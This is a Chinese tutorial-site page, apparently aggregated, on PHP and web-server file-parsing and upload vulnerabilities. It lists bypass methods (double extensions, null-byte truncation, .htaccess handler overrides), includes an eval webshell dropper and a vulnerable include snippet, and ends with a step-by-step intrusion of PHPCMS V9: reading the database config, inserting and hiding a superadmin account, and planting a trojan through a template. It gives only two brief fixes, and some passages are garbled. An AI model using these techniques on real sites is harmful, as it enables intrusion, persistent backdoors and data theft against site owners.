好得很程序员自学网
  • 首页
  • 后端语言
    • C#
    • PHP
    • Python
    • java
    • Golang
    • ASP.NET
  • 前端开发
    • Angular
    • react框架
    • LayUi开发
    • javascript
    • HTML与HTML5
    • CSS与CSS3
    • jQuery
    • Bootstrap
    • NodeJS
    • Vue与小程序技术
    • Photoshop
  • 数据库技术
    • MSSQL
    • MYSQL
    • Redis
    • MongoDB
    • Oracle
    • PostgreSQL
    • Sqlite
    • 数据库基础
    • 数据库排错
  • CMS系统
    • HDHCMS
    • WordPress
    • Dedecms
    • PhpCms
    • 帝国CMS
    • ThinkPHP
    • Discuz
    • ZBlog
    • ECSHOP
  • 高手进阶
    • Android技术
    • 正则表达式
    • 数据结构与算法
  • 系统运维
    • Windows
    • apache
    • 服务器排错
    • 网站安全
    • nginx
    • linux系统
    • MacOS
  • 学习教程
    • 前端脚本教程
    • HTML与CSS 教程
    • 脚本语言教程
    • 数据库教程
    • 应用系统教程
  • 新技术
  • 编程导航
    • 区块链
    • IT资讯
    • 设计灵感
    • 建站资源
    • 开发团队
    • 程序社区
    • 图标图库
    • 图形动效
    • IDE环境
    • 在线工具
    • 调试测试
    • Node开发
    • 游戏框架
    • CSS库
    • Jquery插件
    • Js插件
    • Web框架
    • 移动端框架
    • 模块管理
    • 开发社区
    • 在线课堂
    • 框架类库
    • 项目托管
    • 云服务

当前位置:首页>后端语言>PHP
<tfoot draggable='sEl'></tfoot>

php文件解析漏洞 php 解析

很多站长朋友们都不太清楚php文件解析漏洞,今天小编就来给大家整理php文件解析漏洞,希望对各位有所帮助,具体内容如下:

本文目录一览: 1、 哪些服务器曾被发现文件解析漏洞? 2、 文件上传漏洞的类型有哪些? 3、 文件上传漏洞及解析漏洞总结 4、 怎么样在php中使用fastcgi解析漏洞及修复方案 5、 iis7.0解析漏洞 php用什么软件检测 哪些服务器曾被发现文件解析漏洞?

服务器解析漏洞总结

1、Apache1.x 2.x解析漏洞

Apache服务器解析文件时,从后向前遍历后缀名,直到遇到第一个可以被识别的后缀名,则按该种后缀方式进行文件解析。

这样造成一个危害是:如果应用限制了php等敏感后缀,我们可以通过上传x.php.jpg这种未被拦截的后缀的木马上传,访问时,Apache会因为无法识别jgp,而向前寻找,找到php,按照php文件进行正常解析。木马被执行。

2、IIS6.0解析漏洞

(1)如果目录名包含.asp .asa .cer这种字样,则该目录下所有文件都被当做asp来进行解析

(2)如果文件名中包含.asp;、.asa;、.cer;这种字样,也会被优先按照asp来进行解析

3、Nginx

(1)0.8.37以下的版本,可以上传一个不被过滤后缀名的木马,如:shell.jpg,可以通过请求shell.jpg.php来进行正常解析

(2)0.8.41 – 1.5.6间的版本,可以上传一个不被过滤后缀名的木马,如:shell.jpg,可以通过请求shell.jpg%20.php来进行解析

4、PHP CGI文件解析漏洞

(1)Nginx小于0.8.3以下的版本,且当默认php配置文件cgi.fix_pathinfo=1时,可以上传一个不被过滤后缀名的木马,如:shell.jpg,通过请求shell.phhp/shell.jpg,可以使得shell.jpg被当做php来解析

(2)IIS7.0/7.5之间的版本,如果存在多个Content-Disposition,则IIS会取第一个作为接受参数,同时,如果waf只取第二个进行检测的话,则有可能被绕过过滤。

文件上传漏洞的类型有哪些?

1、 前端检测绕过

有的站点只在前端对文件的类型有所限制,我们只需用bp抓包然后修改文件后缀名就能绕过这种检测。

2、 文件头检测绕过

有的站点使用文件头来检测文件的类型,这种检测可以在shell前加入相应的字节一绕过检测,几种常见的文件类型的头字节如下:

3、 后缀检测绕过

部分服务器仅根据文件后缀、上传时的信息或者文件头来判断文件类型,此时可以绕过。php由于历史的原因,部分解释器可能支持符合正则/ph(p[2-7]?|t(ml)?)/的后缀,如php/php5/pht/phtml/shtml/pwml/phtm等。如果后端对文件名进行了过滤,可以尝试双写文件名,比如1.pphphp。

4、 系统命名绕过

在windows系统中,上传不符合windwos命名规则的文件名会被windows系统自动去掉不符合规则符号后面的内容,例如:test.asp.、test.asp(空格)、test.php:1.jpg、test.php:: D A T A 、 t e s t . p h p : : DATA、test.php:: DATA、test.php::DATA…这些文件上传到服务器端之后都会变成test.php

在linux系统下,可以尝试上传文件后缀名为大小写混用的Php文件。

5、 文件包含绕过

在文件包含的时候,为了灵活包含文件,将被包含文件设置为变量,通过动态变量来引入需要包含的文件,用户可以对变量的值进行控制,而服务器端未对变量进行合理的校验,这样就导致所包含的文件有可能存在恶意代码。比如1.php

<?php $file=$_GET[‘file’]; include($file); ?>

这个程序就包含了一个文件,我们在1.txt文件中写入

<?php phpinfo(); ?>

然后将这个文件包含在1.php中1.php?file=1.txt这样

<?php phpinfo(); ?>就成功写入1.php这个文件当中,我们访问1.php这个文件的时候就能出现php信息那个页面。利用这个漏洞我们就可以进行文件上传,我们只需包含一个一句话木马内容的txt就能用菜刀连接,这样就成功执行了文件上传。

6、 解析漏洞绕过

目录解析:在网站中建立名称为*.asp、.asa格式的文件夹时,其文件夹下面的文件都会被当做asp执行。

文件解析:当文件名为.asp;1.jpg时,也会被当做asp执行

Apache解析漏洞:Apache在解析文件时,是从右往左,如果遇到不认识的扩展名时,就会继续向左判断,例如1.php.rar就会被当做

php解析。

IIS 7.0/IIS 7.5/Nginx<0.8.3畸形文件解析漏洞,当访问时,此时1.php不存在,就会将1.jpg当做php文件去执行,所以如果存在该漏洞,将php木马后缀改成jpg然后访问1.jpg/1.php然后1.jpg就会被当成1.php来执行。

.htaccess,该文件里面的代码如下:

<FilesMatch “1”>

SetHandler application/x-httpd-php

这段代码的意思就是文件名包含”1”这个这个字符串就会被当成php文件来处理。但是值得注意的是上传.htaccess必须是网站根路径。

7、 文件截断绕过

00截断:由于00代表结束符,所以会把00后面的所有字符删除。

能利用这个漏洞的前提是,php版本要小于5.3.4,magic_quotes_gpc需要为OFF状态。我们用bp进行拦包之后,需要send to repeater,然后在hex中,在php后面添加00

8、 竞争条件攻击

一些网站上传文件逻辑上是允许上传任意文件的,然后检查上传文件的内容是否包含webshell脚本,如果包含则删除该文件,这里存在的问题是文件上传成功之后和删除文件之间存在一个短的时间差,攻击者就可以利用这个时间差来上传漏洞攻击。攻击者先上传一个webshell脚本1.php内容如下:

<?php fputs(fopen(‘shell.php’,’w’),’<?php @eval($_POST[a]) ?>’); ?>

代码内容就是生成一个新的webshell,shell.php,那么当1.php上传成功之后,我们快速访问这个文件,这时就会在服务器端当前目录下自动生成shell.php,这时就利用时间差完成了webshell的上传。

文件上传漏洞及解析漏洞总结

Web应用程序通常会有文件上传的功能, 例如在 BBS发布图片 , 在个人网站发布ZIP 压缩 包, 在办公平台发布DOC文件等 , 只要 Web应用程序允许上传文件, 就有可能存在文件上传漏 洞.

什么样的网站会有文件上传漏洞?

大部分文件上传漏洞的产生是因为Web应用程序没有对上传文件的格式进行严格过滤 , 还有一部分是攻击者通过 Web服务器的解析漏洞来突破Web应用程序的防护, 后面我们会讲 到一些常见的解析漏洞, 最后还有一些不常见的其他漏洞, 如 IIS PUT 漏洞等 .

怎么样在php中使用fastcgi解析漏洞及修复方案

(Nginx用户可以选择方案一或方案二,IIS用户请使用方案一)

方案一,修改php.ini文件,将cgi.fix_pathinfo的值设置为0。完成后请重启PHP和NGINX(IIS)。

方案二,在Nginx配置文件中添加以下代码:

复制代码 代码如下:

if ( $fastcgi_script_name ~ \..*\/.*php ) {

return 403;

}

iis7.0解析漏洞 php用什么软件检测

本文利用了PHPCMS V9的两个漏洞,一个是读取任意文件漏洞,另一个是模版运行php脚本漏洞。使用到的工具:Navicat for Mysql/IE浏览器(建议使用代理)/湛蓝v9代码包(包含文中使用到的所有文件、代码和木马)

1、放置data.txt以备在目标站点读取并在目标站点生成PHP木马脚本使用。

例如将data.txt放置在yun.baidu测试数据/j0192/data.txt

2、通过v9漏洞获取配置信息(请参阅:phpcms V9最新读取站点任意文件漏洞)。

/index.php?m=searchc=indexa=public_get_suggest_keywordurl=asdfq=phpsso_server/caches/configs/database.php

3、通过v9系统漏洞获取到的数据库信息远程登陆目标站点数据库,在v9_admin和v9_sso_admin表中添加账号

username字段:admn

password字段:10203d4623c1957d041818196ff9822a

encrypt 字段:bGV22e

issuper 字段: 1

4、通过数据库添加管理员账号后使用以下用户名密码在后台登陆,然后修改当前用户密码。

用户名:admn

密码:123456

5、ctrl+a复制write.php全部内容粘贴进v9默认模版下的footer.html保存,然后点击footer.html的可视化运行该模版中的脚本,到此时就完成在目标站点生成木马脚本。

6、打开ifeng测试数据/caches/caches_template/default/wap/data.class.php

用户名:admin

密码:admin

7、隐藏新增加的管理员。

通过木马脚本上传替换/phpcms/modules/admin/admin_manage.php(默认匹配%admn%),然后登陆目标站点后台查看管理员列表是否还有用户名为admn的超级管理员,如果没有则表明我们完成了新加管理员的隐藏。

8、隐藏新增加的关联链接

通过木马脚本上传替换/phpcms/modules/admin/keylink.php((默认匹配%skyhome%))

9、将目标网站的漏洞修复,以防其他黑客入侵。

通过木马脚本上传替换/phpcms/modules/search/index.php

防黑参考:

1、关闭数据库远程访问。

2、静态文件及附件等文件目录禁止执行权限。

3、脚本文件目录禁止写权限。

4、系统后台等重要目录限制IP访问。

5、及时关注开源系统官方补丁升级和乌云、sebug等漏洞发布平台,修复系统漏洞。

关于php文件解析漏洞的介绍到此就结束了,不知道本篇文章是否对您有帮助呢?如果你还想了解更多此类信息,记得收藏关注本站,我们会不定期更新哦。

查看更多关于php文件解析漏洞 php 解析的详细内容...

声明:本文来自网络,不代表【好得很程序员自学网】立场,转载请注明出处:http://haodehen.cn/did195437
更新时间:2023-04-26   阅读:51次

上一篇: php整形存储范围 php整形存储范围是什么

下一篇:php外网部署目录 php部署网站

最新资料更新

  • 1.php协议input php协议,json
  • 2.php文字合到图片 php 图片合成
  • 3.php判断是否为蜘蛛 php怎么判断是不是数字
  • 4.图片二进制php 图片二进制转换器
  • 5.php获取服务器环境 php获取服务器状态
  • 6.php上传源码教程 php上传下载源码
  • 7.php拼音模糊查询 php模糊搜索功能
  • 8.php登陆检测 php登录原理
  • 9.php空间景安 php 免费空间
  • 10.php接收post php接收post数据在发出代码
  • 11.朔州php后台开发 朔州php培训招聘
  • 12.php提取css文件 php引用css文件
  • 13.php前端页面源码 php前端页面源码是多少
  • 14.php识别条码 php代码扫描
  • 15.php系统源代码下载 php源码免费下载
  • 16.php匹配尖括号 括号匹配python代码
  • 17.php消息通知实例的简单介绍
  • 18.phpping测速 测试php性能工具
  • 19.phpsql过滤类 php过滤器
  • 20.php开启sslopen php开启gd库

CopyRight:2016-2025好得很程序员自学网 备案ICP:湘ICP备09009000号-16 http://haodehen.cn
本站资讯不构成任何建议,仅限于个人分享,参考须谨慎!
本网站对有关资料所引致的错误、不确或遗漏,概不负任何法律责任。
本网站刊载的所有内容(包括但不仅限文字、图片、LOGO、音频、视频、软件、程序等)版权归原作者所有。任何单位或个人认为本网站中的内容可能涉嫌侵犯其知识产权或存在不实内容时,请及时通知本站,予以删除。

网站内容来源于网络分享,如有侵权发邮箱到:kenbest@126.com,收到邮件我们会即时下线处理。
网站框架支持:HDHCMS   51LA统计 百度统计
Copyright © 2018-2025 「好得很程序员自学网」
[ SiteMap ]